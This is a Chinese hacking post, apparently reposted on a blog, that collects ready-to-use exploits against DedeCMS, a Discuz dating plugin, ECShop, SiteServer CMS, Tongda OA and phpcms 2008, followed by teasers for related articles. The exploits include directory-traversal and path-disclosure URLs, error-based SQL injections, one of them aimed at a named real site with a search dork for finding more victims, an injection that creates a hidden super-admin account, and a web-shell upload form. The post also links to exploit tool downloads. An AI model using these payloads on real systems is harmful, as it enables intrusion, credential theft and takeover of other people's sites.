dede 漏洞攻击

一、dedecms找后台

1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理

员帐号,新版本的就直接转向了后台.

2.include/dialog/config.php会爆出后台管理路径

3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录

4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.

5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉

到根目录去.不过这些版本的访问地址有些不同.

地址为require/dialog/select_soft.php?activepath=/././././././././

include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..

存在相同问题的文件还有

include\dialog\select_images.php

include\dialog\select_media.php

include\dialog\select_templets.php

/data/mysql_error_trace.inc

dedecms爆绝对路径工具:http://pan.baidu.com/share/link?shareid=424516&uk=2754130026

二、dz交友插件漏洞

测试EXP

http://www.gzcity.com/jiaoyou.php?pid=1‘ or @`‘` and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(user())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or @`‘` and ‘1‘=‘1

http://www.gzcity.com/jiaoyou.php?pid=1‘ or @`‘` and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or @`‘` and ‘1‘=‘1

应广大基友需求~~~附上自己组合的关键字一个:谷歌关键字Powered by Discuz!inurl:jiaoyou.php

漏洞利用工具:http://pan.baidu.com/share/link?shareid=424518&uk=2754130026

3.最近360爆的 ecshop支付宝漏洞  通杀2.73及以下版本

漏洞利用工具下载:

http://pan.baidu.com/share/link?shareid=424515&uk=2754130026

4、SiteServer CMS  oday

EXP:

直接访问UserCenter/login.aspx

用户名处输入:

123‘insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue‘,‘VffSUZcBPo4=‘,‘Encrypted‘,‘i7jq4LwC25wKDoqHErBWaw==‘);insert into bairong_AdministratorsInRoles values(‘Administrator‘,‘blue‘);insert into bairong_AdministratorsInRoles values(‘RegisteredUser‘,‘blue‘);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator‘,‘blue‘);--

密码为空,输入验证码后提交,

既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。

后台拿shell 自己百度 8种方法siteserver后台getwebshell

5、几个C段ip入侵扫描或者内网入侵的小工具

iisput这个都知道

第二个这个 wvs  http://pan.baidu.com/share/link?shareid=424521&uk=2754130026

第三个这个 sx   http://pan.baidu.com/share/link?shareid=424527&uk=2754130026

6.通达oa  getshell

下面我附一下利用exp

保存下面的代码为1.html  如果需要测试的话,只需要将192.168.56.139改成你的目标站点

exp 放在这里

<form id="frmUpload" enctype="multipart/form-data"

action="http://192.168.56.139/general/vmeet/privateUpload.php?fileName=555.php.111″ method="post">Upload a new file:<br>

<input type="file" name="Filedata" size="50″><br>

<input type="submit" value="Upload">

<!–  http://192.168.56.139/general/vmeet/upload/temp/555.php.111    这里是上传之后的网马–>

</form>

7  phpcms 2008  漏洞

给出exp

www.xxxxx.com/preview.php?info[catid]=15&content=a[page]b&info[contentid]=2′ and (select 1 from(select count(*),concat((select (select (select concat(0x7e,0×27,username,0x3a,password,0×27,0x7e) from phpcms_member limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)– a

8. 几个爆破 shell后门扫描字典http://pan.baidu.com/share/link?shareid=424534&uk=2754130026

时间: 2024-11-15 19:13:58

dede 漏洞攻击的相关文章

(转载)ASP网站如何防止注入漏洞攻击

SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报,如 果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉.但是,SQL注入的手法相当灵活,在注入的时候会碰到很多意外的情况.能不能根据具体情 况进行分析,构造巧妙的SQL语句,从而成功获取想要的数据. 据统计,网站用ASP+Access或SQLServer的占70%以 上,PHP+MySQ占L20%,其他的不足10%.在本文,以SQL-SERVER+ASP例

IIS的Unicode漏洞攻击

IIS有十多种常见漏洞,但利用得最多的莫过于Unicode解析错误漏洞.微软IIS 4.0/5.0在Unicode字符解码的实现中存在一个安全漏洞,用户可以远程通过IIS执行任意命令.当IIS打开文件时,如果该文件名包含Unicode字符,它会对它进行解码.如果用户提供一些特殊的编码,将导致IIS错误地打开或者执行某些Web根目录以外的文件或程序.我们此文就着重来讲讲如何利用这个漏洞入侵IIS. 对于IIS 4.0/5.0中文版,当IIS在收到的URL请求的文件名中,包含一个特殊的编码例如“%c

PHP通用的XSS攻击过滤函数,Discuz系统中 防止XSS漏洞攻击,过滤HTML危险标签属性的PHP函数

XSS攻击在最近很是流行,往往在某段代码里一不小心就会被人放上XSS攻击的代码,看到国外有人写上了函数,咱也偷偷懒,悄悄的贴上来... 原文如下: The goal of this function is to be a generic function that can be used to parse almost any input and render it XSS safe. For more information on actual XSS attacks, check out h

CentOS6.x服务器OpenSSH平滑7.3p版本——拒绝服务器漏洞攻击

对于新安装的Linux服务器,默认OpenSSH及OpenSSL都不是最新的,需要进行升级以拒绝服务器漏洞攻击.本次介绍的是升级生产环境下CentOS6.x系列服务器平滑升级OpenSSL及OpenSSH的方法. 一.服务器漏洞说明 二.环境描述 1)操作系统:CentOS 6.x系列 64位 2)修补前后 使用源码安装的方式 3)连接工具SecureCrt.XShell 三.升级 最好先多开几个root登录的shell窗口万一升级失败可以回退回来,或者安装dropbear只是为了在升级失败ss

XP停服后首个IE 0day漏洞攻击样本曝光 360国内独家可检出

图注:VirusTotal网站截图 中国经济网北京5月1日讯 5月1日消息,上周六微软通报了XP停服后首个IE 0day漏洞,近日针对该漏洞的攻击样本又被国内安全论坛和在线杀毒扫描平台VirusTotal曝出,根据在线杀毒扫描平台VirusTotal 检测结果显示,截至2014年5月1日晚10点,全球仅有5家杀毒软件厂商可以检出该攻击样本,而360是其中唯一一家来自中国的杀毒软件厂商 VirusTotal检测结果显示,在52家全球杀毒软件产品中,目前仅有AntiVir(小红伞).卡巴斯基.微软(

PHP的$_SERVER[&#39;PHP_SELF&#39;]造成的XSS漏洞攻击及其解决方案

$_SERVER['PHP_SELF']简介 $_SERVER['PHP_SELF'] 表示当前 PHP文件相对于网站根目录的位置地址,与 document root 相关. 假设我们有如下网址,$_SERVER['PHP_SELF']得到的结果分别为: http://www.php-note.com/php/    :   /php/test.php http://www.php-note.com/php/test.php    :    /php/test.php http://www.ph

Android StageFright漏洞攻击

1. 简介 网络安全机构Zimperium最近发现一个Android有史以来最为严重的漏洞,该漏洞预计会影响95%的Android设备,攻击者可利用该漏洞远程操控手机的麦克风.窃取文件.查看邮件并获取个人证书等.Android 2.2到5.1的所有版本上均存在此漏洞. 如何触发漏洞攻击 该漏洞未主动性漏洞,不需要用户手动触发,隐蔽性非常高. 通过任何一种方式就收针对此漏洞攻击的视频就会触发,包括但不限于通过彩信,QQ,微信接收此视频都会触发此漏洞.采用Chrome在线播放此视频也会触发攻击. 2

利用foo函数的Bof漏洞攻击

利用foo函数的Bof漏洞攻击 一.基础知识储备 objdump反汇编指令.gdb函数调试运行.Perl语言.|管道符 二.实验步骤 1. 通过反汇编了解程序功能及代码 ①反汇编查看文件内容 ②可以知道getShell函数地址为0804847d ③可知foo函数执行完成之后,系统会调用的下一条指令的地址为80484ba,此地址为返回地址 我们要做的就是通过foo函数的Bof漏洞输入一段设计好的字符串覆盖掉80484ba,使得80484ba的值为0804847d,这样就会执行getshell函数.

基于Armitage的MSF自动化漏洞攻击实践

基于Armitage的MSF自动化漏洞攻击实践 目录 实践环境 预备知识 Armitage基础配置 ms08_067_netapi:自动化漏洞溢出攻击实践 ms14_064_ole_code_execution:IE漏洞自动化攻击实践 ms17_010_eternalblue:"永恒之蓝"自动化攻击实践 office_ms17_11882:Office漏洞自动化攻击实践 John the Ripper_linux口令破解模块:Armitage下Auxiliary辅助模块应用 实践中遇到